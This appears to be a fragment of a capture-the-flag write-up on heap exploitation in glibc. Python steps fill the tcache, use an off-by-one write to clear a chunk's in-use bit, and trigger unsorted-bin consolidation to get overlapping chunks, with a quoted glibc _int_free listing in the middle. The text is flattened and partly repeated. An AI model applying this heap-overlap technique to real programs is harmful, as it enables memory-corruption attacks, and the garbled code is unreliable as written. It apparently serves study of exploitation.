for i in range(7): malloc(0x10, str(i)*0x7) for i in range(3): malloc(0x10, str(i+7)*0x7) for i in range(6): free(i) free(9) #tcache for avoid top chunk consolidate for i in range(6, 9): free(i) # now the heap # tcache-0 # tcache-1 # tcache-2 # tcache-3 # tcache-4 # tcache-5 # unsorted - 6 # unsorted - 7 # unsorted - 8 # tcache-9
for i in range(7): malloc(0x10, str(i)*0x7) for i in range(3): malloc(0x10, str(i+7)*0x7)
for i in range(6): free(i) free(8) free(7) # now chunk -9's pre_size is 0x200 malloc(0xf8, str(8)*0x7) #off-by-one change chunk9's insue free(6) # free into tcache, so we can use unsortbin consolidate free(9) # unsortbin consolidate
# now the heap # chunk-6 tcache # chunk-5 tcache # chunk-4 tcache # chunk-3 tcache # chunk-2 tcache # chunk-1 tcache # chunk - 7 unsorted 7-9 consolidate, and 8 in the big free_chunk # chunk - 8 use this is the overlap # chunk - 9 unsorted # chunk-0 tcache
# now the heap # chunk-6 tcache # chunk-5 tcache # chunk-4 tcache # chunk-3 tcache # chunk-2 tcache # chunk-1 tcache # chunk - 7 unsorted 7-9 consolidate, and 8 in the big free_chunk # chunk - 8 use this is the overlap # chunk - 9 unsorted # chunk-0 tcache for i in range(7): malloc(0x10, str(i+1)*0x7) malloc(0x10, str(0x8))
4194 ------------------------------ free ------------------------------ 4195 */ 4196 4197staticvoid 4198 _int_free (mstate av, mchunkptr p, int have_lock) 4199 { 4200 INTERNAL_SIZE_T size; /* its size */ 4201 mfastbinptr *fb; /* associated fastbin */ 4202 mchunkptr nextchunk; /* next contiguous chunk */ 4203 INTERNAL_SIZE_T nextsize; /* its size */ 4204int nextinuse; /* true if nextchunk is used */ 4205 INTERNAL_SIZE_T prevsize; /* size of previous contiguous chunk */ 4206 mchunkptr bck; /* misc temp for linking */ 4207 mchunkptr fwd; /* misc temp for linking */ 4208 4209 size = chunksize (p); 4210 4211/* Little security check which won't hurt performance: the 4212 allocator never wrapps around at the end of the address space. 4213 Therefore we can exclude some size values which might appear 4214 here by accident or by "design" from some intruder. */ 4215if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0) 4216 || __builtin_expect (misaligned_chunk (p), 0)) 4217 malloc_printerr ("free(): invalid pointer"); 4218/* We know that each chunk is at least MINSIZE bytes in size or a 4219 multiple of MALLOC_ALIGNMENT. */ 4220if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size))) 4221 malloc_printerr ("free(): invalid size"); 4222 4223 check_inuse_chunk(av, p); 4224 4225#if USE_TCACHE 4226 { 4227size_t tc_idx = csize2tidx (size); 4228 4229/* Check to see if it's already in the tcache. */ 4230 tcache_entry *e = (tcache_entry *) chunk2mem (p); 4231 4232/* This test succeeds on double free. However, we don't 100% 4233 trust it (it also matches random payload data at a 1 in 4234 2^<size_t> chance), so verify it's not an unlikely coincidence 4235 before aborting. */ 4236if (__glibc_unlikely (e->key == tcache && tcache)) 4237 { 4238 tcache_entry *tmp; 4239 LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx); 4240for (tmp = tcache->entries[tc_idx]; 4241 tmp; 4242 tmp = tmp->next) 4243if (tmp == e) 4244 malloc_printerr ("free(): double free detected in tcache 2"); 4245/* If we get here, it was a coincidence. We've wasted a few 4246 cycles, but don't abort. */ 4247 } 4248 4249if (tcache 4250 && tc_idx < mp_.tcache_bins 4251 && tcache->counts[tc_idx] < mp_.tcache_count) 4252 { 4253 tcache_put (p, tc_idx); 4254return; 4255 } 4256 } 4257#endif
defexp(): for i in range(7): malloc(0x10, str(i)*0x7) for i in range(3): malloc(0x10, str(i+7)*0x7) for i in range(6): free(i) free(9) #tcache for avoid top chunk consolidate for i in range(6, 9): free(i) # now the heap # tcache-0 # tcache-1 # tcache-2 # tcache-3 # tcache-4 # tcache-5 # unsorted - 6 # unsorted - 7 # unsorted - 8 # tcache-9
for i in range(7): malloc(0x10, str(i)*0x7) for i in range(3): malloc(0x10, str(i+7)*0x7) # now the heap # chunk-6 # chunk-5 # chunk-4 # chunk-3 # chunk-2 # chunk-1 # chunk - 7 # chunk - 8 # chunk - 9 # chunk-0
for i in range(6): free(i) free(8) free(7) # now chunk -9's pre_size is 0x200 malloc(0xf8, str(8)*0x7) #off-by-one change chunk9's insue free(6) # free into tcache, so we can use unsortbin consolidate free(9) # unsortbin consolidate # now the heap # chunk-6 tcache # chunk-5 tcache # chunk-4 tcache # chunk-3 tcache # chunk-2 tcache # chunk-1 tcache # chunk - 7 unsorted 7-9 consolidate, and 8 in the big free_chunk # chunk - 8 use this is the overlap # chunk - 9 unsorted # chunk-0 tcache for i in range(7): malloc(0x10, str(i+1)*0x7) malloc(0x10, str(0x8)) # now the heap # chunk-1 # chunk-2 # chunk-3 # chunk-4 # chunk-5 # chunk-6 # chunk-8 # chunk-0 # # chunk-7